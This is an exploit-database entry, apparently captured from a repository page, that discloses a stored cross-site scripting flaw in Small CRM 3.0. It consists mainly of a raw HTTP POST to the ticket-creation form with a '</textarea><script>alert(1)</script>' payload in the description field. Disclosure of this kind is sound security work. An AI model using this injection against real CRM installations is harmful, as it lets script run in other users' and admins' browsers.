
5 changes to exploits/shellcodes NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC) NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC) Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)
27 lines
No EOL
1 KiB
Text
27 lines
No EOL
1 KiB
Text
# Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)
|
|
# Date: 20/10/2021
|
|
# Exploit Author: Ghuliev
|
|
# Vendor Homepage: https://phpgurukul.com
|
|
# Software Link: https://phpgurukul.com/small-crm-php/
|
|
# Version: 3.0
|
|
# Tested on: Server: Ubuntu
|
|
|
|
When a user or admin creates a ticket, we can inject javascript code into
|
|
ticket.
|
|
|
|
POST /crm/create-ticket.php HTTP/1.1
|
|
Host: IP
|
|
Content-Length: 79
|
|
Cache-Control: max-age=0
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: http://IP
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
|
(KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: http://IP/crm/create-ticket.php
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7
|
|
|
|
subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send |